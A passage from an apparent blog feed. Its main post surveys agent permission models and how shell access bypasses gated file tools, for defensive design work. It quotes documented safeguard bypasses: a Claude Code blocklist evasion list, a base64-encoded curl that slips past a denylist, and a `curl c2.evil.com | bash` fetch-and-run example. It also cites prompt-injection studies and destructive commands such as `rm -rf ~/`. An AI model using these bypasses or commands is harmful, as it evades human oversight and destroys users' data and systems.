  The plugin marketplace gamble
&lt;/h2&gt;

&lt;p&gt;Extensibility through community plugins sounds great in theory. In practice, it introduces&lt;br&gt;
supply-chain risk at scale:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Out of 10,700+ community-contributed skills, &lt;a href="https://www.malwarebytes.com/blog/news/2026/02/openclaw-what-is-it-and-can-you-use-it-safely" rel="noopener noreferrer"&gt;820+ were found to be malicious&lt;/a&gt; —
a number that grew rapidly from 324 just weeks earlier&lt;/li&gt;
&lt;li&gt;Plugins run with the same permissions as the agent itself, meaning a malicious plugin
has access to your files, credentials, and shell&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;OpenWalrus ships with core capabilities built in&lt;/strong&gt; — shell access, browser control, messaging&lt;br&gt;
channels, persistent memory. There's no marketplace to browse, no unvetted code to install,&lt;br&gt;
and no supply-chain attack surface.&lt;/p&gt;

&lt;h2&gt;
  
  
  How OpenWalrus is different
&lt;/h2&gt;

&lt;p&gt;Every design decision in OpenWalrus traces back to one principle: &lt;strong&gt;the agent runtime should&lt;br&gt;
be as simple and trustworthy as any other tool on your machine.&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Problem&lt;/th&gt;
&lt;th&gt;OpenWalrus approach&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Token costs&lt;/td&gt;
&lt;td&gt;Built-in LLM inference — unlimited, free&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Security vulnerabilities&lt;/td&gt;
&lt;td&gt;No network services, no credentials required&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Complex setup&lt;/td&gt;
&lt;td&gt;Single binary, zero dependencies&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Malicious plugins&lt;/td&gt;
&lt;td&gt;Core capabilities built in&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Unreliable memory&lt;/td&gt;
&lt;td&gt;Persistent context that works out of the box&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Slow cold starts&lt;/td&gt;
&lt;td&gt;Under 10 ms — runtime starts instantly, models load async&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Manual model setup&lt;/td&gt;
&lt;td&gt;Auto-detected from hardware — 20+ curated models, auto-quantization&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;OpenWalrus is open source, written in Rust, and runs on macOS and Linux. You can optionally&lt;br&gt;
connect remote LLM providers when you need capabilities beyond local models, but nothing&lt;br&gt;
external is ever &lt;em&gt;required&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://openwalrus.xyz/docs/walrus/getting-started/installation" rel="noopener noreferrer"&gt;Get started in under a minute →&lt;/a&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/why-we-built-openwalrus" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>architecture</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>Tool permissions and the bash bypass problem</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:54:57 +0000</pubDate>
      <link>https://forem.com/crabtalk/tool-permissions-and-the-bash-bypass-problem-355g</link>
      <guid>https://forem.com/crabtalk/tool-permissions-and-the-bash-bypass-problem-355g</guid>
      <description>&lt;p&gt;Most agent frameworks ship a set of structured tools — Read, Write, Edit, Glob, Grep — alongside a general-purpose Bash tool. The structured tools have clear semantics: Edit replaces a specific string in a file, Write creates a file, Read returns file contents. Each can be individually gated with permission rules.&lt;/p&gt;

&lt;p&gt;But there's a problem. If the agent also has Bash, every structured tool is redundant from a security standpoint. &lt;code&gt;Edit&lt;/code&gt; replaces a string in a file — but so does &lt;code&gt;sed -i&lt;/code&gt;. &lt;code&gt;Write&lt;/code&gt; creates a file — but so does &lt;code&gt;echo "content" &amp;gt; file&lt;/code&gt;. &lt;code&gt;Read&lt;/code&gt; returns file contents — but so does &lt;code&gt;cat&lt;/code&gt;. If you deny &lt;code&gt;Write&lt;/code&gt; but allow &lt;code&gt;Bash&lt;/code&gt;, the agent writes files through &lt;code&gt;cat &amp;lt;&amp;lt;'EOF' &amp;gt; file.txt&lt;/code&gt;.&lt;/p&gt;
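&lt;p&gt;The equivalences are trivially demonstrable. Each gated structured tool collapses to one line of POSIX shell (scratch directory; GNU &lt;code&gt;sed&lt;/code&gt; assumed for &lt;code&gt;-i&lt;/code&gt;):&lt;/p&gt;

```shell
# Every structured tool has a bash twin the permission layer never sees.
cd "$(mktemp -d)"
printf 'hello world\n' > file.txt

sed -i 's/hello/goodbye/' file.txt   # Edit: in-place string replacement
cat <<'EOF' > notes.txt              # Write: create a file with content
agent-written content
EOF
contents=$(cat file.txt)             # Read: return file contents
```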

&lt;p&gt;This raises a design question we haven't seen anyone address directly: &lt;strong&gt;what if you skip the structured tools entirely and give agents only bash?&lt;/strong&gt; The structured tools exist for user experience — diffs are reviewable, edits are atomic, reads are paginated. But from a permission standpoint, they create a false sense of control. This post surveys how eight frameworks handle the tension, what the security research says about bash bypasses, and whether the "just bash" design has merit.&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The bypass is not theoretical
&lt;/h2&gt;

&lt;p&gt;The gap between "deny the edit tool" and "the agent edits via bash" is not a theoretical concern. It has been exploited, documented, and CVE-assigned.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Claude Code.&lt;/strong&gt; &lt;a href="https://github.com/anthropics/claude-code/issues/31292" rel="noopener noreferrer"&gt;GitHub issue #31292&lt;/a&gt; documents the most direct case: a user set &lt;code&gt;disallowedTools: [Write, Edit, NotebookEdit]&lt;/code&gt; with a system prompt rule "NEVER write code." The agent bypassed it by running &lt;code&gt;sed -i 's/hello/goodbye/' file.txt&lt;/code&gt;. No error. No warning. The &lt;code&gt;disallowedTools&lt;/code&gt; enforcement blocks the named tool functions but not equivalent Bash operations. The issue author's assessment: "this never worked."&lt;/p&gt;

&lt;p&gt;A second issue (&lt;a href="https://github.com/anthropics/claude-code/issues/6527" rel="noopener noreferrer"&gt;#6527&lt;/a&gt;, 17 comments) shows that when &lt;code&gt;Bash&lt;/code&gt; is in the &lt;code&gt;allow&lt;/code&gt; list, the &lt;code&gt;ask&lt;/code&gt; list for specific bash patterns is completely ignored. A user tried to allow general bash while requiring approval for &lt;code&gt;rm&lt;/code&gt; and &lt;code&gt;git push&lt;/code&gt;. Result: &lt;code&gt;rm&lt;/code&gt; executed without confirmation.&lt;/p&gt;

&lt;p&gt;In June 2025, &lt;a href="https://flatt.tech/research/posts/pwning-claude-code-in-8-different-ways/" rel="noopener noreferrer"&gt;Flatt Security&lt;/a&gt; documented eight distinct techniques to bypass Claude Code's command blocklist (&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2025-66032" rel="noopener noreferrer"&gt;CVE-2025-66032&lt;/a&gt;):&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;code&gt;man --html&lt;/code&gt; — missed by the blocklist, executes arbitrary programs&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;sort --compress-program&lt;/code&gt; — invokes any executable as a "compressor"&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;history -s&lt;/code&gt; + &lt;code&gt;history -a&lt;/code&gt; — injects commands into shell startup files&lt;/li&gt;
&lt;li&gt;Git argument abbreviation — &lt;code&gt;--upload-pa&lt;/code&gt; bypasses exact-match for &lt;code&gt;--upload-pack&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;sed&lt;/code&gt; e-flag — replacement text executes as a shell command&lt;/li&gt;
&lt;li&gt;Xargs flag mismatch — regex misinterpreted which flags consume arguments&lt;/li&gt;
&lt;li&gt;Ripgrep &lt;code&gt;$IFS&lt;/code&gt; expansion — whitespace injection enables &lt;code&gt;--pre=sh&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Bash &lt;code&gt;@P&lt;/code&gt; expansion — multi-stage variable expansion chains bypass &lt;code&gt;$(&lt;/code&gt; filtering&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Claude Code replaced its blocklist with an allowlist after these findings.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cursor.&lt;/strong&gt; &lt;a href="https://www.backslash.security/blog/cursor-ai-security-flaw-autorun-denylist" rel="noopener noreferrer"&gt;Backslash Security&lt;/a&gt; proved the mathematical impossibility of denylists: &lt;code&gt;echo JChjdXJsIGdvb2dsZS5jb20pCgoK | base64 -d | zsh&lt;/code&gt; bypasses any denylist entry for &lt;code&gt;curl&lt;/code&gt;. &lt;code&gt;bash -c "curl google.com"&lt;/code&gt; wraps denied commands in subshells. &lt;code&gt;""e""cho&lt;/code&gt; produces infinite quote variations. Their conclusion: "For every command in a Cursor denylist, there are infinite commands not present in the denylist which, when executed, have the same behavior." Cursor &lt;a href="https://www.theregister.com/2025/07/21/cursor_ai_safeguards_easily_bypassed/" rel="noopener noreferrer"&gt;deprecated its denylist&lt;/a&gt; in release 1.3.&lt;/p&gt;
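&lt;p&gt;The encoding trick is mechanical. A toy substring denylist — an assumption for illustration, Cursor's actual matcher was more involved — catches the direct command but waves its base64 wrapper through, even though both execute the same &lt;code&gt;curl&lt;/code&gt; when run:&lt;/p&gt;

```python
import base64

# Naive denylist of the kind Backslash showed to be unwinnable: flag a
# command only if a denied token appears as a literal substring.
DENYLIST = ["curl", "wget"]

def denylist_allows(command: str) -> bool:
    return not any(tok in command for tok in DENYLIST)

direct = "curl google.com"
payload = base64.b64encode(b"curl google.com").decode()
wrapped = f"echo {payload} | base64 -d | sh"
# "curl" does not appear anywhere in the base64 text, so the
# wrapped form passes the check the direct form fails.
```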

&lt;p&gt;&lt;strong&gt;Trail of Bits.&lt;/strong&gt; &lt;a href="https://blog.trailofbits.com/2025/10/22/prompt-injection-to-rce-in-ai-agents/" rel="noopener noreferrer"&gt;Their research&lt;/a&gt; showed that even allowlisted "safe" commands can be weaponized: &lt;code&gt;go test -exec 'bash -c "curl c2.evil.com | bash"'&lt;/code&gt;, &lt;code&gt;rg --pre=sh&lt;/code&gt;, &lt;code&gt;fd -x=python3&lt;/code&gt;. They reference &lt;a href="https://gtfobins.github.io/" rel="noopener noreferrer"&gt;GTFOBins&lt;/a&gt;, which catalogs hundreds of legitimate Unix binaries that accept arguments enabling arbitrary code execution.&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The real-world damage
&lt;/h2&gt;

&lt;p&gt;The Claude Code issue tracker documents what happens when agents have unrestricted bash:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Issue&lt;/th&gt;
&lt;th&gt;What happened&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://github.com/anthropics/claude-code/issues/30816" rel="noopener noreferrer"&gt;#30816&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;rm -rf&lt;/code&gt; on local drive folders — months of production code deleted&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://github.com/anthropics/claude-code/issues/28521" rel="noopener noreferrer"&gt;#28521&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;find / -delete&lt;/code&gt; during security test — all personal files in /home deleted&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://github.com/anthropics/claude-code/issues/27063" rel="noopener noreferrer"&gt;#27063&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;drizzle-kit push --force&lt;/code&gt; — 60+ production database tables destroyed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://github.com/anthropics/claude-code/issues/29179" rel="noopener noreferrer"&gt;#29179&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;git clean -fd&lt;/code&gt; after &lt;code&gt;git rm -rf .&lt;/code&gt; — gitignored directories permanently deleted&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://github.com/anthropics/claude-code/issues/32637" rel="noopener noreferrer"&gt;#32637&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cp -a&lt;/code&gt; + &lt;code&gt;rm -rf&lt;/code&gt; on iCloud stubs — 110+ sensitive documents destroyed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://github.com/anthropics/claude-code/issues/27675" rel="noopener noreferrer"&gt;#27675&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;python3 manage.py migrate&lt;/code&gt; + raw SQL — irreversible schema changes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;A &lt;a href="https://www.reddit.com/r/ClaudeAI/" rel="noopener noreferrer"&gt;December 2025 Reddit incident&lt;/a&gt; hit 197 points on Hacker News: a user asked Claude to clean up packages and it ran &lt;code&gt;rm -rf tests/ patches/ plan/ ~/&lt;/code&gt; — the trailing &lt;code&gt;~/&lt;/code&gt; expanded to the entire home directory. In January 2026, Claude Cowork executed &lt;code&gt;rm -rf&lt;/code&gt; on 11GB of user data, then marked its task list item "Delete user data folder: Completed."&lt;/p&gt;

&lt;h2&gt;
  
  
  How frameworks handle it today
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Two philosophies
&lt;/h3&gt;

&lt;p&gt;Every framework falls into one of two camps:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Gate the tool, trust the shell.&lt;/strong&gt; Claude Code, LangGraph, Google ADK, and CrewAI distinguish between structured tools and shell access. Each structured tool can be individually permitted or denied. Bash is treated as a separate, higher-risk tool with its own approval flow. The problem: this creates the bypass gap. Denying &lt;code&gt;Write&lt;/code&gt; while allowing &lt;code&gt;Bash&lt;/code&gt; is security theater.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Gate the environment, give full access within it.&lt;/strong&gt; Codex CLI, Cursor (post-1.3), and increasingly Claude Code use OS-level sandboxes as the primary boundary. The agent gets full access to bash and every structured tool — but the sandbox constrains &lt;em&gt;where&lt;/em&gt; those tools can operate. Writes are limited to the workspace. Network is blocked. The &lt;code&gt;.git&lt;/code&gt; directory is read-only. The bypass gap vanishes because both paths are constrained by the same kernel-level policy.&lt;/p&gt;

&lt;h3&gt;
  
  
  The sandbox approach
&lt;/h3&gt;

&lt;p&gt;Codex CLI implements this most cleanly. &lt;a href="https://developer.apple.com/documentation/security/app-sandbox" rel="noopener noreferrer"&gt;Seatbelt&lt;/a&gt; on macOS, &lt;a href="https://docs.kernel.org/security/landlock.html" rel="noopener noreferrer"&gt;Landlock&lt;/a&gt; + seccomp on Linux. Three modes: Suggest (approve everything), Auto (auto-approve within workspace), Full-auto (auto-approve all). Even in full-auto, the sandbox prevents writes outside the workspace. The file-edit vs. bash distinction is irrelevant — both are constrained by the same OS-level policy.&lt;/p&gt;

&lt;p&gt;Cursor adopted the same approach after deprecating its denylist. Their insight: &lt;a href="https://cursor.com/blog/agent-sandboxing" rel="noopener noreferrer"&gt;sandboxed agents stop 40% less often&lt;/a&gt; than unsandboxed ones. The sandbox actually &lt;em&gt;improves&lt;/em&gt; developer experience by replacing per-command approval prompts with environment-level constraints.&lt;/p&gt;

&lt;p&gt;Claude Code's &lt;a href="https://code.claude.com/docs/en/sandboxing" rel="noopener noreferrer"&gt;sandbox&lt;/a&gt; constrains bash and its child processes. But a &lt;a href="https://github.com/anthropics/claude-code/issues/26616" rel="noopener noreferrer"&gt;GitHub issue (#26616)&lt;/a&gt; reveals the gap: the Read, Write, Edit, Glob, and Grep tools execute in the same process as Claude Code itself, outside the sandbox. A prompt injection could use Read to access credentials or Edit to modify configuration — without triggering any sandbox restriction. The sandbox covers bash but not the structured tools.&lt;/p&gt;

&lt;h3&gt;
  
  
  The permission-model approach
&lt;/h3&gt;

&lt;p&gt;Claude Code's &lt;a href="https://code.claude.com/docs/en/permissions" rel="noopener noreferrer"&gt;permission system&lt;/a&gt; is the most granular. Five modes (&lt;code&gt;default&lt;/code&gt;, &lt;code&gt;acceptEdits&lt;/code&gt;, &lt;code&gt;plan&lt;/code&gt;, &lt;code&gt;dontAsk&lt;/code&gt;, &lt;code&gt;bypassPermissions&lt;/code&gt;). Pattern-based specifiers: &lt;code&gt;Bash(npm run *)&lt;/code&gt; allows npm commands, &lt;code&gt;Edit(/src/**/*.ts)&lt;/code&gt; restricts edits to TypeScript files. Shell-aware matching understands &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; operators so &lt;code&gt;Bash(safe-cmd *)&lt;/code&gt; won't approve &lt;code&gt;safe-cmd &amp;amp;&amp;amp; dangerous-cmd&lt;/code&gt;.&lt;/p&gt;
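&lt;p&gt;What shell-aware matching has to do can be sketched in a few lines — this is an illustrative approximation, not Claude Code's actual matcher: split the command on shell operators and require &lt;em&gt;every&lt;/em&gt; segment to match an allowed pattern, so a chained command is never approved on the strength of its first half:&lt;/p&gt;

```python
import fnmatch
import re

# Allow patterns in the spirit of Bash(npm run *); the list is illustrative.
ALLOW = ["npm run *", "safe-cmd", "safe-cmd *"]

def approved(command: str) -> bool:
    # Split on &&, ||, ; and | so each piece is checked independently.
    segments = [s.strip() for s in re.split(r"&&|\|\||;|\|", command)]
    return all(
        any(fnmatch.fnmatch(seg, pat) for pat in ALLOW)
        for seg in segments if seg
    )
```

&lt;p&gt;&lt;code&gt;safe-cmd &amp;amp;&amp;amp; dangerous-cmd&lt;/code&gt; fails because the second segment matches nothing, while &lt;code&gt;npm run build&lt;/code&gt; passes. (Real shells have far more operators than this regex covers — which is exactly why pattern matching alone keeps losing to the bypass catalog above.)&lt;/p&gt;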

&lt;p&gt;OpenClaw separates file tools and exec tools into different groups (&lt;code&gt;group:fs&lt;/code&gt; vs &lt;code&gt;group:runtime&lt;/code&gt;). Denying &lt;code&gt;group:runtime&lt;/code&gt; while allowing &lt;code&gt;group:fs&lt;/code&gt; blocks shell access while keeping file operations. Deny always wins in the policy hierarchy.&lt;/p&gt;

&lt;p&gt;Google ADK provides &lt;code&gt;before_tool_callback&lt;/code&gt; hooks that can inspect arguments and block execution. LangGraph provides &lt;code&gt;interrupt_on&lt;/code&gt; for per-tool human approval. Both are developer-dependent — no automatic enforcement.&lt;/p&gt;

&lt;p&gt;Aider and CrewAI use trust-based models. Aider's &lt;code&gt;--yes&lt;/code&gt; flag bypasses all prompts. CrewAI's tool assignment is all-or-nothing with no runtime permission checks.&lt;/p&gt;

&lt;h2&gt;
  
  
  What if there's only bash?
&lt;/h2&gt;

&lt;p&gt;Here's the contrarian design position: &lt;strong&gt;if bash makes structured tools redundant for security, maybe the solution is to drop the structured tools and treat bash as the single tool that matters.&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Arguments for bash-only
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;One permission boundary instead of many.&lt;/strong&gt; With only bash, there's exactly one tool to gate. No bypass gap. No confusion about which tool has which permission. The agent either has shell access or it doesn't — and if it does, the sandbox is the security boundary.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Simpler mental model.&lt;/strong&gt; Users don't need to understand the difference between &lt;code&gt;Edit&lt;/code&gt; permissions and &lt;code&gt;Bash(sed *)&lt;/code&gt; permissions. There's one tool. Either it's allowed, or it's not.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What agents actually do.&lt;/strong&gt; Many agent workflows are bash-heavy anyway. Running tests, installing packages, git operations, building projects — all happen through the shell. The structured tools are a convenience layer for file editing, but the agent could accomplish the same work through &lt;code&gt;sed&lt;/code&gt;, &lt;code&gt;patch&lt;/code&gt;, &lt;code&gt;cat&lt;/code&gt;, or &lt;code&gt;echo&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Arguments against bash-only
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Reviewability.&lt;/strong&gt; The strongest argument for structured tools isn't security — it's user experience. An &lt;code&gt;Edit&lt;/code&gt; call shows a clean diff: old string, new string, file path. A &lt;code&gt;sed -i 's/old/new/g' file.txt&lt;/code&gt; command is harder to review. A &lt;code&gt;cat &amp;lt;&amp;lt;'EOF' &amp;gt; file.txt&lt;/code&gt; command replaces the entire file with no diff. For long or complex edits, structured tools make the agent's intent transparent.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Atomicity.&lt;/strong&gt; &lt;code&gt;Edit&lt;/code&gt; either succeeds or fails as a unit. A bash pipeline — &lt;code&gt;sed&lt;/code&gt; then &lt;code&gt;mv&lt;/code&gt; then &lt;code&gt;chmod&lt;/code&gt; — can fail partway through, leaving files in inconsistent states. Structured tools avoid this class of errors by design.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The system prompt compliance problem.&lt;/strong&gt; Claude Code's system prompt instructs the agent: "Do NOT use the Bash tool to run &lt;code&gt;cat&lt;/code&gt;, &lt;code&gt;head&lt;/code&gt;, &lt;code&gt;tail&lt;/code&gt;, &lt;code&gt;sed&lt;/code&gt;, &lt;code&gt;awk&lt;/code&gt;, or &lt;code&gt;echo&lt;/code&gt; commands. Instead, use the appropriate dedicated tool." &lt;a href="https://github.com/anthropics/claude-code/issues/32193" rel="noopener noreferrer"&gt;GitHub issue #32193&lt;/a&gt; documents the broader problem: "Every rule in CLAUDE.md is advisory to the model. There is no enforcement mechanism." The agent sometimes uses bash for file operations despite being told not to — but structured tools at least &lt;em&gt;exist&lt;/em&gt; as the preferred path. Remove them, and the agent has no choice but bash for everything.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sandbox limits.&lt;/strong&gt; Even with OS-level sandboxing, bash can reach external services. &lt;code&gt;drizzle-kit push --force&lt;/code&gt; destroyed 60+ production tables (&lt;a href="https://github.com/anthropics/claude-code/issues/27063" rel="noopener noreferrer"&gt;#27063&lt;/a&gt;) — a command that operates on a &lt;em&gt;remote&lt;/em&gt; database through a network connection. &lt;code&gt;gh release delete-asset&lt;/code&gt; deleted assets from GitHub (&lt;a href="https://github.com/anthropics/claude-code/issues/29120" rel="noopener noreferrer"&gt;#29120&lt;/a&gt;). Sandboxing constrains &lt;em&gt;where&lt;/em&gt; the agent operates on the local filesystem, not &lt;em&gt;what&lt;/em&gt; it does via network services.&lt;/p&gt;

&lt;h3&gt;
  
  
  The middle ground: bash with capability declarations
&lt;/h3&gt;

&lt;p&gt;The &lt;a href="https://github.com/anthropics/claude-code/issues/6046" rel="noopener noreferrer"&gt;Codex Exec tool proposal&lt;/a&gt; suggests a compromise: an &lt;code&gt;Exec&lt;/code&gt; tool that invokes commands &lt;em&gt;without shell interpretation&lt;/em&gt; (analogous to &lt;code&gt;subprocess.run(shell=False)&lt;/code&gt;). Arguments are passed as arrays, eliminating shell injection. But as the author acknowledged, &lt;code&gt;sed -i&lt;/code&gt;, &lt;code&gt;python -c&lt;/code&gt;, and &lt;code&gt;perl -i -pe&lt;/code&gt; can all edit files without requiring shell interpretation.&lt;/p&gt;
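&lt;p&gt;The no-shell-interpretation idea is easy to demonstrate with &lt;code&gt;subprocess.run&lt;/code&gt; and an argv array (the Python analogy the proposal itself draws): an injected semicolon stays a literal argument instead of being evaluated by a shell.&lt;/p&gt;

```python
import subprocess
import sys

# shell=False (the default) passes argv directly to exec: no shell ever
# parses the string, so metacharacters have no special meaning.
malicious = "harmless; echo INJECTED"
result = subprocess.run(
    [sys.executable, "-c", "import sys; print(sys.argv[1])", malicious],
    capture_output=True, text=True,
)
# The payload comes back verbatim as one argument; the "; echo" was
# never interpreted as a second command.
```

&lt;p&gt;As the proposal concedes, this closes shell injection but not interpreter arguments — &lt;code&gt;python -c&lt;/code&gt; in the array above executes whatever it is handed.&lt;/p&gt;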

&lt;p&gt;A stronger middle ground: &lt;strong&gt;bash as the only execution tool, but with capability-based sandboxing.&lt;/strong&gt; Instead of gating individual commands, gate &lt;em&gt;capabilities&lt;/em&gt;: filesystem write, network access, process management, package installation. The sandbox enforces capabilities at the OS level. The agent uses bash for everything, but bash can only do what the capability set allows.&lt;/p&gt;
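&lt;p&gt;The declaration-versus-grant check that would sit in front of such a sandbox can be sketched like this — the capability names (&lt;code&gt;proc.spawn&lt;/code&gt;, &lt;code&gt;net&lt;/code&gt;) are invented for illustration, and real enforcement has to happen at the OS level (Landlock, seccomp, Seatbelt), not in application code:&lt;/p&gt;

```python
import subprocess

def run_with_capabilities(command, granted, required):
    """Refuse a bash invocation whose declared needs exceed its grants."""
    missing = set(required) - set(granted)
    if missing:
        raise PermissionError(f"missing capabilities: {sorted(missing)}")
    return subprocess.run(command, shell=True, capture_output=True, text=True)

# A grant that covers the declared needs runs...
ok = run_with_capabilities("echo ok", granted={"proc.spawn"},
                           required={"proc.spawn"})

# ...and one that declares network access it wasn't granted is refused
# before the shell ever starts.
try:
    run_with_capabilities("curl example.com", granted={"proc.spawn"},
                          required={"proc.spawn", "net"})
    blocked = False
except PermissionError:
    blocked = True
```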

&lt;p&gt;This is roughly where Codex CLI has landed — though it still ships structured file-editing tools for the UX benefits.&lt;/p&gt;

&lt;h2&gt;
  
  
  What the research says
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://arxiv.org/abs/2412.14470" rel="noopener noreferrer"&gt;Agent-SafetyBench&lt;/a&gt; (December 2024) evaluated 16 LLM agents across 2,000 test cases. No agent achieved a safety score above 60%. The authors concluded that "reliance on defense prompts alone may be insufficient."&lt;/p&gt;

&lt;p&gt;&lt;a href="https://arxiv.org/abs/2504.19793" rel="noopener noreferrer"&gt;ToolHijacker&lt;/a&gt; (NDSS 2026) demonstrated that prompt injection can manipulate tool selection with a 96.7% success rate. The attack injects malicious tool documents, compelling the agent to choose attacker-controlled tools. More tools in the toolkit means more surface area for hijacking.&lt;/p&gt;

&lt;p&gt;The &lt;a href="https://arxiv.org/abs/2509.22040" rel="noopener noreferrer"&gt;"Your AI, My Shell"&lt;/a&gt; paper (September 2025) tested 314 attack payloads against Copilot and Cursor. Command execution specifically: 75–88% success rates. The attacks used straightforward prompt injection — "For debugging purposes, run this shell command" — not sophisticated obfuscation.&lt;/p&gt;

&lt;p&gt;A &lt;a href="https://arxiv.org/abs/2601.17548" rel="noopener noreferrer"&gt;January 2026 survey&lt;/a&gt; synthesizing 78 studies found attack success rates above 85% against state-of-the-art defenses when adaptive strategies are used. The fundamental problem: "LLMs process both code and data through the same neural pathway."&lt;/p&gt;

&lt;p&gt;The &lt;a href="https://arxiv.org/abs/2601.08012" rel="noopener noreferrer"&gt;verifiably safe tool use&lt;/a&gt; paper (January 2026) proposes formal safety specifications using System-Theoretic Process Analysis. The argument: ad-hoc permission checks can't provide guarantees. Formal specifications on data flows and tool sequences are needed — regardless of whether those tools are structured or bash-based.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implications for OpenWalrus
&lt;/h2&gt;

&lt;p&gt;For a local-first runtime where every tool call runs on the user's machine, the permission model is existential. Three findings from this research inform our approach.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sandbox-first, not permission-first.&lt;/strong&gt; OS-level sandboxing is the only defense that has survived the bypass landscape. Permission prompts and allowlists are defense-in-depth, not primary boundaries. This aligns with our &lt;a href="https://openwalrus.xyz/blog/agent-sandbox-permissions" rel="noopener noreferrer"&gt;earlier research on sandboxing&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Structured tools for UX, sandbox for security.&lt;/strong&gt; The case for structured tools (Read, Write, Edit) is reviewability and atomicity, not security. If security depends on denying &lt;code&gt;Edit&lt;/code&gt; while allowing &lt;code&gt;Bash&lt;/code&gt;, it's already broken. The sandbox should constrain both paths equally.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Capability declarations, not command lists.&lt;/strong&gt; Skills in OpenWalrus &lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;declare their required capabilities&lt;/a&gt;, and the runtime grants or denies them before execution. A skill that needs filesystem write declares &lt;code&gt;capability: fs.write&lt;/code&gt;. A skill that needs network declares &lt;code&gt;capability: net&lt;/code&gt;. The sandbox enforces these capabilities regardless of whether the skill uses a structured tool or raw bash.&lt;/p&gt;

&lt;p&gt;The deeper question — whether to ship structured tools at all or go bash-only — depends on how much we value reviewability. The research suggests that from a security standpoint, structured tools add surface area without adding safety. But from a developer experience standpoint, seeing a clean diff vs. parsing a sed command is a meaningful difference. The answer may be: &lt;strong&gt;use bash as the single execution primitive, but present structured tool results as a rendering layer&lt;/strong&gt; — the agent runs &lt;code&gt;sed&lt;/code&gt;, but the UI shows a diff.&lt;/p&gt;
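&lt;p&gt;That rendering-layer idea can be sketched in a few lines: snapshot the file, let the agent edit it through the shell (a portable sed-and-move here), then show the user a unified diff instead of the raw command.&lt;/p&gt;

```python
import difflib
import os
import subprocess
import tempfile

path = os.path.join(tempfile.mkdtemp(), "app.py")
with open(path, "w") as f:
    f.write("print('hello')\n")

with open(path) as f:
    before = f.readlines()

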